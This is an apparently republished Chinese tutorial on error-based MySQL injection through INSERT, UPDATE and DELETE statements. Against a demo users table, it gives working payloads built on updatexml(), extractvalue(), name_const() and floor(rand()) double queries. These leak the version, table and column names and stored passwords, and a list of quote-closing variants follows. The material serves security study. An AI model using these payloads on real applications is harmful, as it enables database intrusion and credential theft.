利用insert,update和delete注入獲取資料
作者:
·
2014/05/27 15:05
0x00 簡介
利用SQL隱碼攻擊獲取資料庫資料,利用的方法可以大致分為聯合查詢、報錯、布林盲注以及延時注入,通常這些方法都是基於select查詢語句中的SQL注射點來實現的。那麼,當我們發現了一個基於insert、update、delete語句的注射點時(比如有的網站會記錄使用者瀏覽記錄,包括referer、client_ip、user-agent等,還有類似於使用者註冊、密碼修改、資訊刪除等功能),還可以用如上方法獲取我們需要的資料嗎?在這裡,我們以MYSQL的顯錯為例,看一下如何在insert、update、delete的注射點中獲取我們想要的資料。
0x01 環境搭建
為了更好的演示注射效果,我們先利用下面的語句建立原始資料:
create database newdb;
use newdb;
create table users(
id int(3) not null auto_increment,
username varchar(20) not null,
password varchar(20) not null,
primary key (id)
);
insert into users values(1,'Jane','Eyre');
看一下當前資料結構:
0x02 注入語法
因為我們這裡是用的顯錯模式,所以思路就是在insert、update、delete語句中人為構造語法錯誤,利用如下語句:
insert into users (id, username, password) values (2,''inject here'','Olivia');
insert into users (id, username, password) values (2,""inject here"",'Olivia');
注意:大家看到本來是要填入username欄位的地方,我們填了'inject here'和”inject here”兩個欄位來實現爆錯,一個是單引號包含、一個是雙引號包含,要根據實際的注入點靈活構造。
0x03 利用updatexml()獲取資料
updatexml()函式是MYSQL對XML文件資料進行查詢和修改的XPATH函式。
payload:
or updatexml(1,concat(0x7e,(version())),0) or
Insert:
INSERT INTO users (id, username, password) VALUES (2,'Olivia' or updatexml(1,concat(0x7e,(version())),0) or'', 'Nervo');
Update:
UPDATE users SET password='Nicky' or updatexml(2,concat(0x7e,(version())),0) or''WHERE id=2 and username='Olivia';
Delete:
DELETE FROM users WHERE id=2 or updatexml(1,concat(0x7e,(version())),0) or'';
提取資料:
由於篇幅有限,在insert、update、delete用法一致的時候,我會僅以insert為例說明。
所用的payload為:
or updatexml(0,concat(0x7e,(SELECT concat(table_name) FROM information_schema.tables WHERE table_schema=database() limit 0,1)),0) or
獲取newdb資料庫表名:
獲取users表的列名:
利用insert獲取users表的資料:
利用delete獲取users表的資料:
我們可以用insert、update、delete語句獲取到資料庫表名、列名,但是不能用update獲取當前表的資料:
在這裡,為了演示用update獲取資料,我們臨時再建立一個含有id,name,address的students表,並插入一條資料:
再次利用update獲取users表的資料:
如果你碰到一個update的注入並且想獲取當前表的資料的話,可用用雙查詢,我後面會講到。
0x04 利用extractvalue()獲取資料
extractvalue()函式也是MYSQL對XML文件資料進行查詢和修改的XPATH函式。
payload:
or extractvalue(1,concat(0x7e,database())) or
Insert:
INSERT INTO users (id, username, password) VALUES (2,'Olivia' or extractvalue(1,concat(0x7e,database())) or'', 'Nervo');
update:
UPDATE users SET password='Nicky' or extractvalue(1,concat(0x7e,database())) or'' WHERE id=2 and username='Nervo';
delete:
DELETE FROM users WHERE id=1 or extractvalue(1,concat(0x7e,database())) or'';
提取資料:
同樣,在insert、update、delete用法一致的時候,我會僅以insert為例說明。
獲取newdb資料庫表名:
INSERT INTO users (id, username, password) VALUES (2,'Olivia' or extractvalue(1,concat(0x7e,(SELECT concat(table_name) FROM information_schema.tables WHERE table_schema=database() limit 1,1))) or'', 'Nervo');
獲取users表的列名:
INSERT INTO users (id, username, password) VALUES (2,'Olivia' or extractvalue(1,concat(0x7e,(SELECT concat(column_name) FROM information_schema.columns WHERE table_name='users' limit 0,1))) or'', 'Nervo');
獲取users表的資料:
INSERT INTO users (id, username, password) VALUES (2,'Olivia' or extractvalue(1,concat(0x7e,(SELECT concat_ws(':',id, username, password) FROM users limit 0,1))) or '', 'Nervo');
同樣,我們可以用insert、update、delete語句獲取到資料庫表名、列名,但是不能用update獲取當前表的資料。
0x05 利用name_const()獲取資料
name_const()函式是MYSQL5.0.12版本加入的一個返回給定值的函式。當用來產生一個結果集合列時 , NAME_CONST() 促使該列使用給定名稱。
Payload:
or (SELECT * FROM (SELECT(name_const(version(),1)),name_const(version(),1))a) or
Insert:
INSERT INTO users (id, username, password) VALUES (1,'Olivia' or (SELECT * FROM (SELECT(name_const(version(),1)),name_const(version(),1))a) or '','Nervo');
update:
UPDATE users SET password='Nicky' or (SELECT * FROM (SELECT(name_const(version(),1)),name_const(version(),1))a) or '' WHERE id=2 and username='Nervo';
delete:
DELETE FROM users WHERE id=1 or (SELECT * FROM (SELECT(name_const(version(),1)),name_const(version(),1))a)or '';
提取資料:
在最新的MYSQL版本中,使用name_const()函式只能提取到資料庫的版本資訊。但是在一些比較舊的高於5.0.12(包括5.0.12)的MYSQL版本中,可以進一步提取更多資料。在這裡我使用MySQL5.0.45進行演示。
首先,我們做一個簡單的SELECT查詢,檢查我們是否可以提取資料。
INSERT INTO users (id, username, password) VALUES (1,'Olivia' or (SELECT*FROM(SELECT name_const((SELECT 2),1),name_const((SELECT 2),1))a) or '', 'Nervo');
如果顯示ERROR 1210 (HY000): Incorrect arguments to NAME_CONST,那就洗洗睡吧。。
如果顯示ERROR 1060 (42S21): Duplicate column name '2',就可以進一步獲取更多資料。
獲取newdb資料庫表名:
INSERT INTO users (id, username, password) VALUES (1,'Olivia' or (SELECT*FROM(SELECT name_const((SELECT table_name FROM information_schema.tables WHERE table_schema=database() limit 1,1),1),name_const(( SELECT table_name FROM information_schema.tables WHERE table_schema=database() limit 1,1),1))a) or '', 'Nervo');
ERROR 1060 (42S21): Duplicate column name 'users'
獲取users表的列名:
INSERT INTO users (id, username, password) VALUES (1,'Olivia' or (SELECT*FROM(SELECT name_const((SELECT column_name FROM information_schema.columns WHERE table_name='users' limit 0,1),1),name_const(( SELECT column_name FROM information_schema.columns WHERE table_name='users' limit 0,1),1))a) or '', 'Nervo');
ERROR 1060 (42S21): Duplicate column name 'id'
獲取users表的資料:
INSERT INTO users (id, username, password) VALUES (2,'Olivia' or (SELECT*FROM(SELECT name_const((SELECT concat_ws(0x7e,id, username, password) FROM users limit 0,1),1),name_const(( SELECT concat_ws(0x7e,id, username, password) FROM users limit
0,1),1))a) or '', 'Nervo');
ERROR 1060 (42S21): Duplicate column name '1~Jane~Eyre'
0x06 利用子查詢注入
原理與select查詢時的顯錯注入一致。
Insert:
INSERT INTO users (id, username, password) VALUES (1,'Olivia' or (SELECT 1 FROM(SELECT count(*),concat((SELECT (SELECT concat(0x7e,0x27,cast(database() as char),0x27,0x7e)) FROM information_schema.tables limit 0,1),floor(rand(0)*2))x FROM information_schema.columns group by x)a) or'', 'Nervo');
update:
UPDATE users SET password='Nicky' or (SELECT 1 FROM(SELECT count(*),concat((SELECT(SELECT concat(0x7e,0x27,cast(database() as char),0x27,0x7e)) FROM information_schema.tables limit 0,1),floor(rand(0)*2))x FROM information_schema.columns group by x)a)or'' WHERE id=2 and username='Nervo';
delete:
DELETE FROM users WHERE id=1 or (SELECT 1 FROM(SELECT count(*),concat((SELECT(SELECT concat(0x7e,0x27,cast(database() as char),0x27,0x7e)) FROM information_schema.tables limit 0,1),floor(rand(0)*2))x FROM information_schema.columns group by x)a)or'' ;
提取資料:
獲取newdb資料庫表名:
INSERT INTO users (id, username, password) VALUES (1,'Olivia' or (SELECT 1 FROM(SELECT count(*),concat((SELECT (SELECT (SELECT distinct concat(0x7e,0x27,cast(table_name as char),0x27,0x7e) FROM information_schema.tables WHERE table_schema=database() LIMIT 1,1)) FROM information_schema.tables limit 0,1),floor(rand(0)*2))x FROM information_schema.columns group by x)a) or '','Nervo');
獲取users表的列名:
INSERT INTO users (id, username, password) VALUES (1, 'Olivia' or (SELECT 1 FROM(SELECT count(*),concat((SELECT (SELECT (SELECT distinct concat(0x7e,0x27,cast(column_name as char),0x27,0x7e) FROM information_schema.columns WHERE table_schema=database() AND table_name='users' LIMIT 0,1)) FROM information_schema.tables limit 0,1),floor(rand(0)*2))x FROM information_schema.columns group by x)a) or '', 'Nervo');
獲取users表的資料:
INSERT INTO users (id, username, password) VALUES (1, 'Olivia' or (SELECT 1 FROM(SELECT count(*),concat((SELECT (SELECT (SELECT concat(0x7e,0x27,cast(users.username as char),0x27,0x7e) FROM `newdb`.users LIMIT 0,1) ) FROM information_schema.tables limit 0,1),floor(rand(0)*2))x FROM information_schema.columns group by x)a) or '', 'Nervo');
0x07 更多閉合變種
' or (payload) or '
' and (payload) and '
' or (payload) and '
' or (payload) and '='
'* (payload) *'
' or (payload) and '
" – (payload) – "
0x08 引用
http://dev.mysql.com/
http://websec.ca/kb/sql_injection
from:http://www.exploit-db.com/wp-content/themes/exploit/docs/33253.pdf
本文章來源於烏雲知識庫,此映象為了方便大家學習研究,文章版權歸烏雲知識庫!
相關文章
- MySQL之資料的insert-delete-update操作MySqldelete
- Oracle資料庫中Insert、Update、Delete操作速度Oracle資料庫delete
- 模擬insert,update和delete造成阻塞的示例delete
- 34、VIEW可以insert,delete,update.Viewdelete
- Default Locking for INSERT, UPDATE, DELETE, and SELECT ... FOR UPDATE (351)delete
- mysql innodb新建索引堵塞update ,insert,deleteMySql索引delete
- SQLite語句(二):INSERT DELETE UPDATE SELECTSQLitedelete
- sql server 帶有OUTPUT的INSERT,DELETE,UPDATESQLServerdelete
- MongoDB入門系列(二):Insert、Update、Delete、DropMongoDBdelete
- java-Mybatis XML 對映器(select,insert, update 和 delete)JavaMyBatisXMLdelete
- mysql 在delete、insert、update 時,page的變化MySqldelete
- MERGE新特性(UPDATE WHERE,DELETE WHERE,INSERT WHERE)delete
- LINQ to SQL語句之Insert/Update/Delete操作SQLdelete
- MySQL 4.1.0 中文參考手冊 --- 6.4 資料操縱:SELECT, INSERT, UPDATE, DELETE (轉)MySqldelete
- KunlunDB功能之insert/update/delete...returning語句delete
- 索引是否也能提高UPDATE,DELETE,INSERT速度 解釋索引delete
- MySQL資料災難挽救之Delete\UpdateMySqldelete
- 輕量ORM-SqlRepoEx (四)INSERT、UPDATE、DELETE 語句ORMSQLdelete
- Delete,insert,update與undo的關係[轉載TOM文章]delete
- Thinkphp 3.2.3 parseWhere設計缺陷導致update/delete注入 分析PHPdelete
- SQL Server的Merge —— 一步實現 insert,update,deleteSQLServerdelete
- DELETE資料導致INSERT邏輯讀增加delete
- 【MyBatis原始碼分析】insert方法、update方法、delete方法處理流程(上篇)MyBatis原始碼delete
- 【MyBatis原始碼分析】insert方法、update方法、delete方法處理流程(下篇)MyBatis原始碼delete
- myisam對於update,insert,delete關於auto_incremant的影響deleteREM
- innodb對於update,insert,delete關於auto_incremant的影響deleteREM
- MyBatis(五) insert、update、delete 、主鍵回填、返回matched行數和affected行數、引數配置#{},${}MyBatisdelete
- ASP.NET動態網站開發培訓-20.INSERT、UPDATE和DELETE語句ASP.NET網站delete
- 如何利用電商API介面來獲取商品資料API
- 如何利用API介面獲取電商平臺資料?API
- 利用XMLHTTP 從其他頁面獲取資料 (轉)XMLHTTP
- 檢視insert,delete,update對基表的影響(檢視初識)delete
- 如何插入insert_update,delete_select特殊字元&到oracle表中delete字元Oracle
- 恢復update,delete表資料錯誤的語句delete
- update,delete與INNER JOIN 以及刪除重複資料delete
- datatables 獲取 pageLength 和 pageStart,重新獲取table資料
- sql server merge 做insert和updateSQLServer
- 大資料實戰:電商該如何利用大資料獲取流量?大資料